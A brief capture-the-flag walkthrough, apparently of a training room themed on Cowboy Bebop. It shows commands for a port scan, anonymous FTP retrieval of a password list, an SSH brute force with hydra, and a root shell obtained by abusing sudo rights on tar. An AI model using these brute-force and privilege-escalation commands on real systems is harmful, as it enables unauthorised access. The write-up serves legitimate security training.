Bounty Hunter — Cowboy Bebop is one of my favorite anime. Let’s start by clicking the Deploy button!
After deployed, I set an enviroment TARGET for target box so i dont need to keep typing the IP by doing:
$ export TARGET=10.10.114.135
#Deploy the machine. — No answer needed
#Find open ports on the machine — No answer needed
Though it doest not require an answer, by looking at the question, I will run nmap on it:
$ nmap -sV -sC $TARGET
Looking at the FTP can let anonymous login in try:
$ ftp $TARGET
Found locks.txt and task.txt let’s download them.
$ ftp>get locks.txt
$ ftp>get task.txt
#Who wrote the task list? — lin
By looking at the task.txt, we found our answer by:
$ cat task.txt
#What service can you bruteforce with the text file found? — SSH
By looking at the locks.txt, we got some passwords, I guess we can brute force the SSH service:
$ cat locks.txt
#What is the users password? — [NO SPOILER]
Let’s try to brute force the SSH service with give passwords:
$ hydra -f -I -vV -t 64 -l lin -P ./locks.txt $TARGET ssh
#user.txt — [NO SPOILER]
By login in with the username and password from the previous step. We have a shell!
$ ssh lin@TARGET
Lets examine the user.txt~
#root.txt — [NO SPOILER]
In order to see if we can get a root account, we first check what is given:
$ sudo -l
It’s tar program. Let find out from https://gtfobins.github.io/
sudo tar -cf /dev/null /dev/null — checkpoint=1 — checkpoint-action=exec=/bin/sh
Got the root! Then answer is just right in front!
